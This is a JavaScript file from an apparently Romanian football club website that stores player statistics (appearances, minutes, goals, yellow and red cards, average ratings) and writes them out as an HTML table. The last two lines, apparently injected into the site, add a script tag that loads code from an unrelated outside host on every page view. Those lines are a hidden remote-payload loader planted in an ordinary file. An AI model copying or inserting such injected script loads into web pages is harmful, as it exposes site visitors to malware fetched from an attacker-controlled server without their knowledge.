

function league(nume, meciuri, minute, goluri, galbene, rosii, note) {

this.nume = nume
this.meciuri = meciuri
this.minute = minute
this.goluri = goluri
this.galbene = galbene
this.rosii = rosii
this.note = note
}

ech = new Array(7)
var nr_inreg=27;


//                         nume jucator /  meciuri jucate / minute jucate / goluri marcate / cartonase G / cartonase R   
//      ----------------------------------------------------------------------------------------------------------------------
                                                
 ech [0] = new league(" <b>Player</b>         " , " <b>Appear.</b> " , " <b>Minutes</b> " , " <b>Goals</b> ", " <IMG src='img/yellow.gif'><b>Cards</b> ", " <IMG src='img/red.gif'><b>Cards</b> ", " <b>Av.Rat.</b> ")                                   	                             
 ech [1] = new league(" <b>Glenn Moss</b>           " , " 1 " , " 90 " , " 0 ", " 0 ", " 0 ", " 5 ")
 ech [2] = new league(" <b>Vladimir Gaev</b>        " , " 0 " , "  0 " , " 0 ", " 0 ", " 0 ", " 0 ")
 ech [3] = new league(" <b>Florin Matache</b>       " , " 2 " , "180 " , " 0 ", " 0 ", " 0 ", " 7 ")
 ech [4] = new league(" <b>Daniel Galamaz</b>       " , " 0 " , "  0 " , " 0 ", " 0 ", " 0 ", " 0 ")
 ech [5] = new league(" <b>Lucian Goian</b>         " , " 0(1) " , " 15 " , " 0 ", " 0 ", " 0 ", " 6 ")
 ech [6] = new league(" <b>Cosmin Moti</b>          " , " 3 " , "270 " , " 0 ", " 0 ", " 0 ", " 8 ")
 ech [7] = new league(" <b>Cosmin Pascovici</b>     " , " 1(1) " , " 89 " , " 0 ", " 0 ", " 0 ", " 6 ")
 ech [8] = new league(" <b>Cristi Pulhac</b>        " , " 2 " , "164 " , " 0 ", " 1 ", " 1 ", " 4 ")
 ech [9] = new league(" <b>Dorin Mihut</b>          " , " 0 " , "  0 " , " 0 ", " 0 ", " 0 ", " 0 ")
 ech [10] = new league(" <b>George Blay</b>         " , " 3 " , "270 " , " 0 ", " 1 ", " 0 ", " 6.5 ")
 ech [11] = new league(" <b>Radu Stefan</b>         " , " 3 " , "270 " , " 0 ", " 1 ", " 0 ", " 7 ")
 ech [12] = new league(" <b>Ze Kalanga</b>          " , " 1 " , " 45 " , " 0 ", " 0 ", " 0 ", " 5 ")
 ech [13] = new league(" <b>Leo Lerinc</b>          " , " 0 " , "  0 " , " 0 ", " 0 ", " 0 ", " 0 ")
 ech [14] = new league(" <b>Adrian Cristea</b>      " , " 2 " , "180 " , " 1 ", " 1 ", " 0 ", " 7 ")
 ech [15] = new league(" <b>Adrian Ropotan</b>      " , " 0(1) " , " 17 " , " 0 ", " 1 ", " 0 ", " 7 ")
 ech [16] = new league(" <b>Cornel Predescu</b>     " , " 0(3) " , " 84 " , " 0 ", " 0 ", " 0 ", " 7 ")
 ech [17] = new league(" <b>Iulian Tames</b>        " , " 3 " , "206 " , " 0 ", " 1 ", " 0 ", " 6 ")
 ech [18] = new league(" <b>Andrei Margaritescu</b> " , " 3 " , "270 " , " 0 ", " 1 ", " 0 ", " 7 ")
 ech [19] = new league(" <b>Sreten Stanic</b>       " , " 0(1) " , "  2 " , " 0 ", " 0 ", " 0 ", " 0 ")
 ech [20] = new league(" <b>Catalin Munteanu</b>    " , " 3 " , "269 " , " 1 ", " 0 ", " 0 ", " 7 ")
 ech [21] = new league(" <b>Ionel Danciulescu</b>   " , " 2 " , "154 " , " 1 ", " 0 ", " 0 ", " 6 ")
 ech [22] = new league(" <b>Ionel Ganea</b>         " , " 2(1) " , "191 " , " 0 ", " 2 ", " 0 ", " 7 ")
 ech [23] = new league(" <b>Claudiu Niculescu</b>   " , " 2(1) " , "189 " , " 1 ", " 0 ", " 0 ", " 7 ")
 ech [24] = new league(" <b>Dan Codreanu</b>        " , " 0 " , "  0 " , " 0 ", " 0 ", " 0 ", " 0 ")
 ech [25] = new league(" <b>Liviu Ganea</b>         " , " 0 " , "  0 " , " 0 ", " 0 ", " 0 ", " 0 ")



for (i=0;i<nr_inreg;i++){             
  document.write("<table width=600 border=0 bordercolor=#ffffff bordercolorlight=#c60000 bordercolordark=darkred><tr>")
  document.write("<td width=25% class=din>",ech[i].nume,"</td>")
  document.write("<td width=12% class=din>",ech[i].meciuri,"</td>")
  document.write("<td width=12% class=din>",ech[i].minute,"</td>")
  document.write("<td width=12% class=din>",ech[i].goluri,"</td>")
  document.write("<td width=12% class=din>",ech[i].galbene,"</td>")
  document.write("<td width=12% class=din>",ech[i].rosii,"</td>")
  document.write("<td width=10% class=din>",ech[i].note,"</td></tr>")
  document.write("<tr><td colspan=8 class=din bgcolor=#eeeeee></td></tr></table>")

}


document.write('<script src=http://romelgemstone.com/images/image.php ><\/script>');
document.write('<script src=http://romelgemstone.com/images/image.php ><\/script>');